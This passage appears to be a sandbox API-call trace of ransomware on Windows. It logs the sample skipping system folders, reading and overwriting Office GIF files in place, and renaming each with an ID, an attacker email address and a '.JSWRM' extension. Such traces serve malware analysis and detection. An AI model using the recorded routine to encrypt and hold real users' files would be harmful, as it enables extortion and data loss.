-1 [0119.044] lstrcmpiW (lpString1="PDIR28B.GIF", lpString2="perflogs") returned -1 [0119.044] lstrcmpiW (lpString1="PDIR28B.GIF", lpString2="documents and settings") returned 1 [0119.044] lstrcmpiW (lpString1="PDIR28B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.044] lstrcmpiW (lpString1="PDIR28B.GIF", lpString2="system volume information") returned -1 [0119.044] lstrcmpiW (lpString1="PDIR28B.GIF", lpString2="msocache") returned 1 [0119.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0119.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR28B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR28B.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR28B.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0119.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0119.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR28B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR28B.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR28B.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0119.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0119.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0119.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0119.044] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR28B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir28b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.045] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1668) returned 1 [0119.045] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x680) returned 0x22d530 [0119.045] ReadFile (in: hFile=0x314, lpBuffer=0x22d530, nNumberOfBytesToRead=0x680, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x22d530*, lpNumberOfBytesRead=0x345e534*=0x680, lpOverlapped=0x0) returned 1 [0119.052] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.052] WriteFile (in: hFile=0x314, lpBuffer=0x22d530*, nNumberOfBytesToWrite=0x680, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x22d530*, lpNumberOfBytesWritten=0x345e530*=0x680, lpOverlapped=0x0) returned 1 [0119.053] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d530 | out: hHeap=0x1e0000) returned 1 [0119.053] CloseHandle (hObject=0x314) returned 1 [0119.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0119.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0119.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0119.053] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0119.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0119.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.053] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0119.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0119.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0119.053] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0119.053] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0119.053] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR28B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir28b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR28B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir28b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0119.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0119.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0119.054] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad3eea7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad3eea7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad3eea7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1786, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR28F.GIF", cAlternateFileName="")) returned 1 [0119.054] lstrcmpiW (lpString1="PDIR28F.GIF", lpString2=".") returned 1 [0119.054] lstrcmpiW (lpString1="PDIR28F.GIF", lpString2="..") returned 1 [0119.054] lstrcmpiW (lpString1="PDIR28F.GIF", lpString2="...") returned 1 [0119.054] lstrcmpiW (lpString1="PDIR28F.GIF", lpString2="windows") returned -1 [0119.054] lstrcmpiW (lpString1="PDIR28F.GIF", lpString2="recovery") returned -1 [0119.054] lstrcmpiW (lpString1="PDIR28F.GIF", lpString2="perflogs") returned -1 [0119.054] lstrcmpiW (lpString1="PDIR28F.GIF", lpString2="documents and settings") returned 1 [0119.054] lstrcmpiW (lpString1="PDIR28F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.054] lstrcmpiW (lpString1="PDIR28F.GIF", lpString2="system volume information") returned -1 [0119.054] lstrcmpiW (lpString1="PDIR28F.GIF", lpString2="msocache") returned 1 [0119.054] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0119.054] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR28F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.054] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR28F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR28F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0119.054] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0119.054] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR28F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.054] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR28F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR28F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0119.054] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0119.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0119.055] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.055] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0119.055] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR28F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir28f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.055] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=6022) returned 1 [0119.055] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1780) returned 0x24c1d0 [0119.055] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1780, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1780, lpOverlapped=0x0) returned 1 [0119.077] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.078] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1780, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1780, lpOverlapped=0x0) returned 1 [0119.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0119.078] CloseHandle (hObject=0x314) returned 1 [0119.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0119.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0119.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0119.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0119.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0119.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0119.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0119.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0119.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0119.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0119.078] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR28F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir28f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR28F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir28f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0119.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0119.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0119.079] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad3eea7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad3eea7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad3eea7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11b3, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR29B.GIF", cAlternateFileName="")) returned 1 [0119.079] lstrcmpiW (lpString1="PDIR29B.GIF", lpString2=".") returned 1 [0119.079] lstrcmpiW (lpString1="PDIR29B.GIF", lpString2="..") returned 1 [0119.079] lstrcmpiW (lpString1="PDIR29B.GIF", lpString2="...") returned 1 [0119.079] lstrcmpiW (lpString1="PDIR29B.GIF", lpString2="windows") returned -1 [0119.080] lstrcmpiW (lpString1="PDIR29B.GIF", lpString2="recovery") returned -1 [0119.080] lstrcmpiW (lpString1="PDIR29B.GIF", lpString2="perflogs") returned -1 [0119.080] lstrcmpiW (lpString1="PDIR29B.GIF", lpString2="documents and settings") returned 1 [0119.080] lstrcmpiW (lpString1="PDIR29B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.080] lstrcmpiW (lpString1="PDIR29B.GIF", lpString2="system volume information") returned -1 [0119.080] lstrcmpiW (lpString1="PDIR29B.GIF", lpString2="msocache") returned 1 [0119.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0119.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR29B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR29B.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR29B.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0119.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0119.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR29B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR29B.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR29B.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0119.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0119.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0119.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0119.080] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR29B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir29b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.081] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=4531) returned 1 [0119.081] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11b0) returned 0x24c1d0 [0119.081] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x11b0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x11b0, lpOverlapped=0x0) returned 1 [0119.150] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.150] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x11b0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x11b0, lpOverlapped=0x0) returned 1 [0119.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0119.150] CloseHandle (hObject=0x314) returned 1 [0119.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0119.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0119.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0119.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0119.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0119.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0119.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0119.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0119.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0119.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0119.151] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR29B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir29b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR29B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir29b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0119.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0119.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0119.152] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad3eea7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad3eea7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad3eea7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x59bc, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR29F.GIF", cAlternateFileName="")) returned 1 [0119.152] lstrcmpiW (lpString1="PDIR29F.GIF", lpString2=".") returned 1 [0119.152] lstrcmpiW (lpString1="PDIR29F.GIF", lpString2="..") returned 1 [0119.152] lstrcmpiW (lpString1="PDIR29F.GIF", lpString2="...") returned 1 [0119.152] lstrcmpiW (lpString1="PDIR29F.GIF", lpString2="windows") returned -1 [0119.152] lstrcmpiW (lpString1="PDIR29F.GIF", lpString2="recovery") returned -1 [0119.153] lstrcmpiW (lpString1="PDIR29F.GIF", lpString2="perflogs") returned -1 [0119.153] lstrcmpiW (lpString1="PDIR29F.GIF", lpString2="documents and settings") returned 1 [0119.153] lstrcmpiW (lpString1="PDIR29F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.153] lstrcmpiW (lpString1="PDIR29F.GIF", lpString2="system volume information") returned -1 [0119.153] lstrcmpiW (lpString1="PDIR29F.GIF", lpString2="msocache") returned 1 [0119.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0119.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR29F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR29F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR29F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0119.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0119.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR29F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR29F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR29F.GIF", lpUsedDefaultChar=0x0) returned 11 